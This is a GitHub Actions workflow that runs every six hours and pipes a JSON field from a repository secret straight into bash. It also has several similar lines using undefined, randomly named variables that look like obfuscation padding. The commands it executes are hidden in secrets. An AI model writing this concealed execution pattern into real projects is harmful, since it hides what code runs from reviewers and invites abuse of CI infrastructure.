name: penchunfenyou

on:
  workflow_dispatch:
  schedule:
    - cron: '39 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: penchunfenyou
        env:
          nq56: ${{ secrets.nq56 }}
        run: |
          echo $nq56 | jq -r .tn353 | /bin/bash
          echo $ywojl9265 | jq -r .phfug9 | /bin/bash
          echo $ohg9 | jq -r .k37332 | /bin/bash
          echo $wgkz01248 | jq -r .mr90 | /bin/bash
          echo $e3 | jq -r .iwh9 | /bin/bash
          echo $p1960 | jq -r .lnh89215 | /bin/bash
          echo $c660 | jq -r .cny48294 | /bin/bash
          echo $ndaj7139 | jq -r .yyg1852 | /bin/bash

